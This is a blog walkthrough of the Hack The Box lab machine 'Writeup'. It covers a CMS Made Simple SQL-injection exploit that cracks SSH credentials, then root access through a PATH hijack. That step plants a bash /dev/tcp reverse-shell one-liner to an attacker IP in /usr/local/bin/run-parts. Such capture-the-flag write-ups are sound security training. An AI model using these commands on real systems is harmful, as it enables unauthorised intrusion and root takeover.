Hack The Box – Writeup Box Walkthrough By Nikhil Sahoo

 

Introduction

Back with a new blog. Today we will go through the walkthrough of the Hack the Box machine Writeup based on the Linux machine which retired very recently. It was a bit tricky box given that it was categorized into the easy level. Getting the user flag was pretty straightforward but got a little bit stuck during the privilege escalation part. So without further ado let’s begin…

Recon

We’ll start with our recon by doing an Nmap scan.

nmap -sC -sV 10.10.10.138

 

As we can see that port 80 is open so let’s check that first in our browser.

 

As you can see from the above text a DoS protection script has been implemented so we won’t be fuzzing for directories and files here.

Heading back to our Nmap scan we can clearly see a disallowed entry in the robots.txt file named /writeup/. Let’s navigate to that page.

Let’s check it’s source code to see if we can get any hint from there.

 

Ok, so it looks like the page is built using CMS made simple framework.

 

Exploitation

Going back to our terminal let’s search for any available exploits using searchsploit: searchsploit “CMS made simple”

 

Looks like an SQL injection exploit is available, let’s try using this as it affects all the versions less than 2.2.10. More details about this could be found here

Before proceeding further let’s look at the code for once.

 

As per the description, it is a time-based SQL injection and we can also specify a wordlist for password cracking so let’s run this code along with our favourite password wordlist: rockyou.txt

python <path to exploit code> -u http://10.10.10.138/writeup/ –crack -w <path to password list>

 

So we successfully got the username and password.

username: jkr

password: raykayjay9

Now if you remember we had ssh port(22) open as well. Let’s try using the above credentials there. Type in the below ssh command to log in to the box.

ssh jkr@10.10.10.148

Let’s type in the password as above and after logging in we should be getting our user flag in the current directory.

 

Privilege Escalation

Now let’s start hunting for our root flag. We can start by monitoring the system continuously using an amazing tool/script named pspy.

We can transfer it either by scp command or simply by hosting it in our web server using python/apache. Let’s run pspy now…

 

Although a lot of information is given above but let’s only look at the  PATH variable there and the run-parts command running as UID 0. For those who don’t know PATH variable is simply an environmental variable in Linux and other Unix-like operating systems that tells the shell which directories to search for executable files in response to commands issued by a user.

In simple words, if we want to run an executable file we first go to that directory where it is present and run it by typing “./filename” but if we simply want to run that file from any directory just by typing in “filename” without the “./” then we need to add that directory path to the PATH variable.  You can find more information here

Let’s check the path of run-parts by typing in “which run-parts” and also check the variable path by typing in “echo $PATH“.

So here’s what we got in the PATH variable:

 

Now the next step is to check all the writable directories in the box. Type in “find / -type d -writable 2>/dev/null

 

Looks like the /usr/local/bin/ directory is writable and is also included in the PATH variable so what we can do is we can add our own run-parts file in that directory which would contain our reverse shell and on executing it would give us our reverse shell.

So first things first let’s insert our reverse shell into run-parts and place it in /usr/local/bin/ by typing in:

echo “/bin/bash -c bash -i >& /dev/tcp/10.10.15.171/1234 0>&1” > /usr/local/bin/run-parts

You can get a list of reverse shells from pentestmonkey.

Next, let’s give executable permission to the file:

chmod 777 /usr/local/bin/run-parts

Now let’s move on to our other terminal and open our port for listening via netcat:

nc -lnvp 1234

 

Now, all we have to do is to wait for our file to execute automatically after a couple of minutes depending on the traffic of the box. If the traffic is less especially for the VIP users you can simply open another terminal and open another ssh session by logging in.

And after a couple of minutes, we got our reverse shell as root.

 

Let’s move to the root directory and view the root.txt file.

 

Thus we got our root flag and the challenge was successfully completed.

So that’s for now. See you next time. Goodbye

You can have a look at my previous article on Hack The Box: Swagshop Writeup. Here is the link of the article

Loved what you read?

If so, then kindly comment, follow and share our website for much more interesting stuff  ?

For any queries you can send a Hi to my Linkedin Handle: Here

 

 

You may also like...

1 Response

  1. Critical minds says:

    Good job

Leave a Reply

Your email address will not be published. Required fields are marked *